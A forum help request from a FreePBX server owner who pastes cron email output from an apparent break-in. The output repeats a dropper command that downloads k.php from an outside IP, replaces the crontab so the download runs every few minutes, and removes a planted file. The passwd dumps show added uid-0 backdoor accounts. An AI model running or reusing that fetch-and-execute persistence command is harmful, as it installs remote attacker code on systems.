Being bombarded by emails from cron jobs

I am not a linux expert, and really don’t know where to look. I am getting the following 2 emails basically every minute. IP changed to protect the innocent. Removing a little bit to not be too long too… That is crazy.

Saving to: ‘/var/lib/asterisk/bin/devnull’

2022-01-09 19:20:05 (265 KB/s) - ‘/var/lib/asterisk/bin/devnull’ saved [17215]

/var/lib/asterisk/bin/devnull: line 2: /var/www/html/admin/views/ajax.php: Permission denied
cp: cannot create regular file ‘/var/www/html/admin/assets/js/config.php’: Permission denied
cp: cannot create regular file ‘/var/www/html/admin/assets/config.php’: Permission denied
cp: cannot create regular file ‘/var/www/html/admin/assets/ajax.php’: Permission denied
touch: cannot touch ‘/var/www/html/admin/views/ajax.php’: Permission denied
/tmp/test.sh: line 1: /var/www/html/admin/modules/freepbx_ha/license.php: Permission denied total 24 drwxr-xr-x. 12 asterisk asterisk 4096 Nov 29 13:00 .
drwxr-xr-x. 7 root root 84 Dec 23 18:11 …
-rw-r–r-- 1 asterisk asterisk 18 Dec 7 2016 .bash_logout
-rw-r–r-- 1 asterisk asterisk 193 Dec 7 2016 .bash_profile
-rw-r–r-- 1 asterisk asterisk 231 Dec 7 2016 .bashrc
drwxr-xr-x 2 asterisk asterisk 42 Nov 29 12:59 .clang-tools
drwxr-xr-x. 3 asterisk asterisk 24 Nov 29 09:31 .config
drwxrwxr-x. 2 asterisk asterisk 79 Jan 9 19:15 .gnupg
drwxr-xr-x. 5 asterisk asterisk 36 Nov 29 09:31 .node
drwxr-xr-x. 9 asterisk asterisk 93 Nov 29 09:36 .node-gyp
drwxr-xr-x. 6 asterisk asterisk 94 Nov 29 13:00 .npm
-rw-r–r-- 1 asterisk asterisk 18 Jan 9 19:15 .npmrc
-rw-r–r-- 1 asterisk asterisk 0 Aug 6 2017 .odbc.ini
drwxr-xr-x 3 asterisk asterisk 16 Nov 29 09:31 .package_cache
drwxr-xr-x 3 asterisk asterisk 18 Aug 7 2017 .pki
drwxrwxr-x. 6 asterisk asterisk 4096 Dec 17 08:18 .pm2
drwx------ 2 asterisk asterisk 36 Jul 9 2020 .ssh
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
asterisk:x:995:995::/home/asterisk:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
systemd-bus-proxy:x:994:992:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:993:991:User for polkitd:/:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
openvpn:x:992:990:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
radiusd:x:95:95:radiusd user:/var/lib/radiusd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin mongodb:x:184:987:MongoDB Database Server:/var/lib/mongodb:/sbin/nologin
chrony:x:991:986::/var/lib/chrony:/sbin/nologin
redis:x:990:985:Redis Database Server:/var/lib/redis:/sbin/nologin
unbound:x:989:984:Unbound DNS resolver:/etc/unbound:/sbin/nologin
sugarmaint:x:0:0::/home/sugarmaint:/bin/bash
supports:x:0:0::/home/supports:/bin/bash
supermaint:x:0:0::/home/supermaint:/bin/bash
total 4
4 drwxr-xr-x. 12 asterisk asterisk 4096 Nov 29 13:00 asterisk
0 drwx------ 2 root root 59 Dec 23 18:11 sugarmaint
0 drwx------ 2 root root 59 Dec 23 01:59 supermaint
0 drwx------ 2 root root 59 Dec 23 01:59 supports
total 80
drwxrwxr-x 9 asterisk asterisk 4096 Jan 9 19:20 .
drwxrwxr-x. 120 asterisk asterisk 4096 Jan 3 12:22 …
-rw-rw-r-- 1 asterisk asterisk 803 May 8 2017 ajax.php
drwxrwxr-x 4 asterisk asterisk 25 May 8 2017 assets
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 files
-rw-rw-r-- 1 asterisk asterisk 1366 May 8 2017 Freepbx_ha.class.php
drwxrwxr-x 3 asterisk asterisk 4096 May 8 2017 functions.inc
-rw-rw-r-- 1 asterisk asterisk 1062 May 8 2017 functions.inc.php
drwxrwxr-x 2 asterisk asterisk 27 May 8 2017 hooks
drwxrwxr-x 4 asterisk asterisk 51 May 8 2017 i18n
drwxrwxr-x 2 asterisk asterisk 71 May 8 2017 images
-rw-rw-r-- 1 asterisk asterisk 325 May 8 2017 install.php
-rw-rw-r-- 1 asterisk asterisk 11436 May 8 2017 LICENSE
-rw-rw-r-- 1 asterisk asterisk 7975 May 8 2017 module.sig
-rw-rw-r-- 1 asterisk asterisk 2299 May 8 2017 module.xml
-rw-rw-r-- 1 asterisk asterisk 885 May 8 2017 moveapache.php
-rw-rw-r-- 1 asterisk asterisk 3079 May 8 2017 page.freepbx_ha.php
-rw-rw-r-- 1 asterisk asterisk 3692 May 8 2017 upgradecluster.sh
-rw-rw-r-- 1 asterisk asterisk 121 May 8 2017 Upgrade.repo
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 views
total 84
drwxrwxr-x 9 asterisk asterisk 4096 Jan 9 19:20 .
drwxrwxr-x. 120 asterisk asterisk 4096 Jan 3 12:22 …
-rw-rw-r-- 1 asterisk asterisk 803 May 8 2017 ajax.php
drwxrwxr-x 4 asterisk asterisk 25 May 8 2017 assets
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 files
-rw-rw-r-- 1 asterisk asterisk 1366 May 8 2017 Freepbx_ha.class.php
drwxrwxr-x 3 asterisk asterisk 4096 May 8 2017 functions.inc
-rw-rw-r-- 1 asterisk asterisk 1062 May 8 2017 functions.inc.php
drwxrwxr-x 2 asterisk asterisk 27 May 8 2017 hooks
drwxrwxr-x 4 asterisk asterisk 51 May 8 2017 i18n
drwxrwxr-x 2 asterisk asterisk 71 May 8 2017 images
-rw-rw-r-- 1 asterisk asterisk 325 May 8 2017 install.php
-rw-rw-r-- 1 asterisk asterisk 11436 May 8 2017 LICENSE
-rw-r–r-- 1 asterisk asterisk 598 Jan 9 19:20 license.php
-rw-rw-r-- 1 asterisk asterisk 7975 May 8 2017 module.sig
-rw-rw-r-- 1 asterisk asterisk 2299 May 8 2017 module.xml
-rw-rw-r-- 1 asterisk asterisk 885 May 8 2017 moveapache.php
-rw-rw-r-- 1 asterisk asterisk 3079 May 8 2017 page.freepbx_ha.php
-rw-rw-r-- 1 asterisk asterisk 3692 May 8 2017 upgradecluster.sh
-rw-rw-r-- 1 asterisk asterisk 121 May 8 2017 Upgrade.repo
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 views
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
asterisk:x:995:995::/home/asterisk:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
systemd-bus-proxy:x:994:992:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:993:991:User for polkitd:/:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
openvpn:x:992:990:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
radiusd:x:95:95:radiusd user:/var/lib/radiusd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin mongodb:x:184:987:MongoDB Database Server:/var/lib/mongodb:/sbin/nologin
chrony:x:991:986::/var/lib/chrony:/sbin/nologin
redis:x:990:985:Redis Database Server:/var/lib/redis:/sbin/nologin
unbound:x:989:984:Unbound DNS resolver:/etc/unbound:/sbin/nologin
mbrevda:x:1000:1000::/home/mbrevda:/bin/bash
supports:x:0:0::/home/supports:/bin/bash
supermaint:x:0:0::/home/supermaint:/bin/bash
total 4
4 drwxr-xr-x. 12 asterisk asterisk 4096 Nov 29 13:00 asterisk
0 drwx------ 2 root root 59 Dec 23 18:11 sugarmaint
0 drwx------ 2 root root 59 Dec 23 01:59 supermaint
0 drwx------ 2 root root 59 Dec 23 01:59 supports
wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull;crontab -r;{echo “/3 * * * * chmod +x /var/lib/asterisk/bin/devnull;/var/lib/asterisk/bin/devnull";} | crontab -; rm -rf /var/spool/asterisk/tmp/k rm -rf /var/www/html/admin/modules/freepbx_ha/license.php
rm -rf /var/www/html/admin/modules/freepbx_ha/license.php
rm -rf /var/www/html/admin/modules/freepbx_ha/license.php
total 24
drwxr-xr-x. 12 asterisk asterisk 4096 Nov 29 13:00 .
drwxr-xr-x. 7 root root 84 Dec 23 18:11 …
-rw-r–r-- 1 asterisk asterisk 18 Dec 7 2016 .bash_logout
-rw-r–r-- 1 asterisk asterisk 193 Dec 7 2016 .bash_profile
-rw-r–r-- 1 asterisk asterisk 231 Dec 7 2016 .bashrc
drwxr-xr-x 2 asterisk asterisk 42 Nov 29 12:59 .clang-tools
drwxr-xr-x. 3 asterisk asterisk 24 Nov 29 09:31 .config
drwxrwxr-x. 2 asterisk asterisk 79 Jan 9 19:15 .gnupg
drwxr-xr-x. 5 asterisk asterisk 36 Nov 29 09:31 .node
drwxr-xr-x. 9 asterisk asterisk 93 Nov 29 09:36 .node-gyp
drwxr-xr-x. 6 asterisk asterisk 94 Nov 29 13:00 .npm
-rw-r–r-- 1 asterisk asterisk 18 Jan 9 19:15 .npmrc
-rw-r–r-- 1 asterisk asterisk 0 Aug 6 2017 .odbc.ini
drwxr-xr-x 3 asterisk asterisk 16 Nov 29 09:31 .package_cache
drwxr-xr-x 3 asterisk asterisk 18 Aug 7 2017 .pki
drwxrwxr-x. 6 asterisk asterisk 4096 Dec 17 08:18 .pm2
drwx------ 2 asterisk asterisk 36 Jul 9 2020 .ssh
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
asterisk:x:995:995::/home/asterisk:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
systemd-bus-proxy:x:994:992:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:993:991:User for polkitd:/:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
openvpn:x:992:990:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
radiusd:x:95:95:radiusd user:/var/lib/radiusd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin mongodb:x:184:987:MongoDB Database Server:/var/lib/mongodb:/sbin/nologin
chrony:x:991:986::/var/lib/chrony:/sbin/nologin
redis:x:990:985:Redis Database Server:/var/lib/redis:/sbin/nologin
unbound:x:989:984:Unbound DNS resolver:/etc/unbound:/sbin/nologin
supports:x:0:0::/home/supports:/bin/bash
supermaint:x:0:0::/home/supermaint:/bin/bash
sugarmaint:x:0:0::/home/sugarmaint:/bin/bash
total 4
4 drwxr-xr-x. 12 asterisk asterisk 4096 Nov 29 13:00 asterisk
0 drwx------ 2 root root 59 Dec 23 18:11 sugarmaint
0 drwx------ 2 root root 59 Dec 23 01:59 supermaint
0 drwx------ 2 root root 59 Dec 23 01:59 supports
total 80
drwxrwxr-x 9 asterisk asterisk 4096 Jan 9 19:20 .
drwxrwxr-x. 120 asterisk asterisk 4096 Jan 3 12:22 …
-rw-rw-r-- 1 asterisk asterisk 803 May 8 2017 ajax.php
drwxrwxr-x 4 asterisk asterisk 25 May 8 2017 assets
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 files
-rw-rw-r-- 1 asterisk asterisk 1366 May 8 2017 Freepbx_ha.class.php
drwxrwxr-x 3 asterisk asterisk 4096 May 8 2017 functions.inc
-rw-rw-r-- 1 asterisk asterisk 1062 May 8 2017 functions.inc.php
drwxrwxr-x 2 asterisk asterisk 27 May 8 2017 hooks
drwxrwxr-x 4 asterisk asterisk 51 May 8 2017 i18n
drwxrwxr-x 2 asterisk asterisk 71 May 8 2017 images
-rw-rw-r-- 1 asterisk asterisk 325 May 8 2017 install.php
-rw-rw-r-- 1 asterisk asterisk 11436 May 8 2017 LICENSE
-rw-rw-r-- 1 asterisk asterisk 7975 May 8 2017 module.sig
-rw-rw-r-- 1 asterisk asterisk 2299 May 8 2017 module.xml
-rw-rw-r-- 1 asterisk asterisk 885 May 8 2017 moveapache.php
-rw-rw-r-- 1 asterisk asterisk 3079 May 8 2017 page.freepbx_ha.php
-rw-rw-r-- 1 asterisk asterisk 3692 May 8 2017 upgradecluster.sh
-rw-rw-r-- 1 asterisk asterisk 121 May 8 2017 Upgrade.repo
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 views
total 84
drwxrwxr-x 9 asterisk asterisk 4096 Jan 9 19:20 .
drwxrwxr-x. 120 asterisk asterisk 4096 Jan 3 12:22 …
-rw-rw-r-- 1 asterisk asterisk 803 May 8 2017 ajax.php
drwxrwxr-x 4 asterisk asterisk 25 May 8 2017 assets
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 files
-rw-rw-r-- 1 asterisk asterisk 1366 May 8 2017 Freepbx_ha.class.php
drwxrwxr-x 3 asterisk asterisk 4096 May 8 2017 functions.inc
-rw-rw-r-- 1 asterisk asterisk 1062 May 8 2017 functions.inc.php
drwxrwxr-x 2 asterisk asterisk 27 May 8 2017 hooks
drwxrwxr-x 4 asterisk asterisk 51 May 8 2017 i18n
drwxrwxr-x 2 asterisk asterisk 71 May 8 2017 images
-rw-rw-r-- 1 asterisk asterisk 325 May 8 2017 install.php
-rw-rw-r-- 1 asterisk asterisk 11436 May 8 2017 LICENSE
-rw-r–r-- 1 asterisk asterisk 598 Jan 9 19:20 license.php
-rw-rw-r-- 1 asterisk asterisk 7975 May 8 2017 module.sig
-rw-rw-r-- 1 asterisk asterisk 2299 May 8 2017 module.xml
-rw-rw-r-- 1 asterisk asterisk 885 May 8 2017 moveapache.php
-rw-rw-r-- 1 asterisk asterisk 3079 May 8 2017 page.freepbx_ha.php
-rw-rw-r-- 1 asterisk asterisk 3692 May 8 2017 upgradecluster.sh
-rw-rw-r-- 1 asterisk asterisk 121 May 8 2017 Upgrade.repo
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 views
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
asterisk:x:995:995::/home/asterisk:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
systemd-bus-proxy:x:994:992:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:993:991:User for polkitd:/:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
openvpn:x:992:990:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
radiusd:x:95:95:radiusd user:/var/lib/radiusd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin mongodb:x:184:987:MongoDB Database Server:/var/lib/mongodb:/sbin/nologin
chrony:x:991:986::/var/lib/chrony:/sbin/nologin
redis:x:990:985:Redis Database Server:/var/lib/redis:/sbin/nologin
unbound:x:989:984:Unbound DNS resolver:/etc/unbound:/sbin/nologin
mbrevda:x:1000:1000::/home/mbrevda:/bin/bash
supermaint:x:0:0::/home/supermaint:/bin/bash
sugarmaint:x:0:0::/home/sugarmaint:/bin/bash
total 4
4 drwxr-xr-x. 12 asterisk asterisk 4096 Nov 29 13:00 asterisk
0 drwx------ 2 root root 59 Dec 23 18:11 sugarmaint
0 drwx------ 2 root root 59 Dec 23 01:59 supermaint
0 drwx------ 2 root root 59 Dec 23 01:59 supports
wget http://1.1.1.1/k.php -O /var/lib/asterisk/bin/devnull;crontab -r;{echo "
/3 * * * * chmod +x /var/lib/asterisk/bin/devnull;/var/lib/asterisk/bin/devnull”;} | crontab -; rm -rf /var/spool/asterisk/tmp/k rm -rf /var/www/html/admin/modules/freepbx_ha/license.php
rm -rf /var/www/html/admin/modules/freepbx_ha/license.php
rm -rf /var/www/html/admin/modules/freepbx_ha/license.php

The second email is the following

Saving to: ‘/var/lib/asterisk/bin/devnull2’

 0K .......... ......                                       288K=0.06s

2022-01-09 19:26:05 (288 KB/s) - ‘/var/lib/asterisk/bin/devnull2’ saved [17215]

total 340
dr-xr-x—. 5 root root 4096 Nov 29 12:39 .
dr-xr-xr-x. 18 root root 4096 May 25 2018 …
-rw-------. 1 root root 12817 Aug 6 2017 anaconda-ks.cfg
-rw------- 1 root root 3119 Nov 30 17:17 .asterisk_history
-rw------- 1 root root 19497 Jan 3 16:27 .bash_history
-rw-r–r–. 1 root root 18 Dec 29 2013 .bash_logout
-rw-r–r–. 1 root root 358 Dec 24 05:19 .bash_profile
-rw-r–r–. 1 root root 358 Dec 24 05:19 .bashrc
drwx------ 4 root root 35 Sep 30 2020 .config
-rw-r–r–. 1 root root 100 Dec 29 2013 .cshrc
-rw-r–r-- 1 root root 249497 Nov 29 13:18 freepbx16_upgrade.log
-rw-r–r–. 1 root root 1392 Aug 6 2017 ks-post-chroot.log
-rw-r–r–. 1 root root 8319 Aug 6 2017 ks-post.log
-rw------- 1 root root 1498 Oct 1 2020 .mysql_history
drwxr----- 3 root root 18 Aug 6 2017 .pki
-rw-------. 1 root radiusd 1024 Aug 6 2017 .rnd
drwxr-xr-x 2 root root 28 Apr 27 2020 .ssh
-rw-r–r–. 1 root root 129 Dec 29 2013 .tcshrc
-rw------- 1 root root 3825 Oct 1 2020 .viminfo
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
asterisk:x:995:995::/home/asterisk:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
systemd-bus-proxy:x:994:992:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:993:991:User for polkitd:/:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
openvpn:x:992:990:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
radiusd:x:95:95:radiusd user:/var/lib/radiusd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin mongodb:x:184:987:MongoDB Database Server:/var/lib/mongodb:/sbin/nologin
chrony:x:991:986::/var/lib/chrony:/sbin/nologin
redis:x:990:985:Redis Database Server:/var/lib/redis:/sbin/nologin
unbound:x:989:984:Unbound DNS resolver:/etc/unbound:/sbin/nologin
sugarmaint:x:0:0::/home/sugarmaint:/bin/bash
supports:x:0:0::/home/supports:/bin/bash
supermaint:x:0:0::/home/supermaint:/bin/bash
total 4
4 drwxr-xr-x. 12 asterisk asterisk 4096 Nov 29 13:00 asterisk
0 drwx------ 2 root root 59 Dec 23 18:11 sugarmaint
0 drwx------ 2 root root 59 Dec 23 01:59 supermaint
0 drwx------ 2 root root 59 Dec 23 01:59 supports
total 80
drwxrwxr-x 9 asterisk asterisk 4096 Jan 9 19:26 .
drwxrwxr-x. 120 asterisk asterisk 4096 Jan 3 12:22 …
-rw-rw-r-- 1 asterisk asterisk 803 May 8 2017 ajax.php
drwxrwxr-x 4 asterisk asterisk 25 May 8 2017 assets
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 files
-rw-rw-r-- 1 asterisk asterisk 1366 May 8 2017 Freepbx_ha.class.php
drwxrwxr-x 3 asterisk asterisk 4096 May 8 2017 functions.inc
-rw-rw-r-- 1 asterisk asterisk 1062 May 8 2017 functions.inc.php
drwxrwxr-x 2 asterisk asterisk 27 May 8 2017 hooks
drwxrwxr-x 4 asterisk asterisk 51 May 8 2017 i18n
drwxrwxr-x 2 asterisk asterisk 71 May 8 2017 images
-rw-rw-r-- 1 asterisk asterisk 325 May 8 2017 install.php
-rw-rw-r-- 1 asterisk asterisk 11436 May 8 2017 LICENSE
-rw-rw-r-- 1 asterisk asterisk 7975 May 8 2017 module.sig
-rw-rw-r-- 1 asterisk asterisk 2299 May 8 2017 module.xml
-rw-rw-r-- 1 asterisk asterisk 885 May 8 2017 moveapache.php
-rw-rw-r-- 1 asterisk asterisk 3079 May 8 2017 page.freepbx_ha.php
-rw-rw-r-- 1 asterisk asterisk 3692 May 8 2017 upgradecluster.sh
-rw-rw-r-- 1 asterisk asterisk 121 May 8 2017 Upgrade.repo
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 views
total 84
drwxrwxr-x 9 asterisk asterisk 4096 Jan 9 19:26 .
drwxrwxr-x. 120 asterisk asterisk 4096 Jan 3 12:22 …
-rw-rw-r-- 1 asterisk asterisk 803 May 8 2017 ajax.php
drwxrwxr-x 4 asterisk asterisk 25 May 8 2017 assets
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 files
-rw-rw-r-- 1 asterisk asterisk 1366 May 8 2017 Freepbx_ha.class.php
drwxrwxr-x 3 asterisk asterisk 4096 May 8 2017 functions.inc
-rw-rw-r-- 1 asterisk asterisk 1062 May 8 2017 functions.inc.php
drwxrwxr-x 2 asterisk asterisk 27 May 8 2017 hooks
drwxrwxr-x 4 asterisk asterisk 51 May 8 2017 i18n
drwxrwxr-x 2 asterisk asterisk 71 May 8 2017 images
-rw-rw-r-- 1 asterisk asterisk 325 May 8 2017 install.php
-rw-rw-r-- 1 asterisk asterisk 11436 May 8 2017 LICENSE
-rw-r–r-- 1 root root 598 Jan 9 19:26 license.php
-rw-rw-r-- 1 asterisk asterisk 7975 May 8 2017 module.sig
-rw-rw-r-- 1 asterisk asterisk 2299 May 8 2017 module.xml
-rw-rw-r-- 1 asterisk asterisk 885 May 8 2017 moveapache.php
-rw-rw-r-- 1 asterisk asterisk 3079 May 8 2017 page.freepbx_ha.php
-rw-rw-r-- 1 asterisk asterisk 3692 May 8 2017 upgradecluster.sh
-rw-rw-r-- 1 asterisk asterisk 121 May 8 2017 Upgrade.repo
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 views
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
asterisk:x:995:995::/home/asterisk:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
systemd-bus-proxy:x:994:992:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:993:991:User for polkitd:/:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
openvpn:x:992:990:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
radiusd:x:95:95:radiusd user:/var/lib/radiusd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin mongodb:x:184:987:MongoDB Database Server:/var/lib/mongodb:/sbin/nologin
chrony:x:991:986::/var/lib/chrony:/sbin/nologin
redis:x:990:985:Redis Database Server:/var/lib/redis:/sbin/nologin
unbound:x:989:984:Unbound DNS resolver:/etc/unbound:/sbin/nologin
sugarmaint:x:0:0::/home/sugarmaint:/bin/bash
supports:x:0:0::/home/supports:/bin/bash
supermaint:x:0:0::/home/supermaint:/bin/bash
total 4
4 drwxr-xr-x. 12 asterisk asterisk 4096 Nov 29 13:00 asterisk
0 drwx------ 2 root root 59 Dec 23 18:11 sugarmaint
0 drwx------ 2 root root 59 Dec 23 01:59 supermaint
0 drwx------ 2 root root 59 Dec 23 01:59 supports
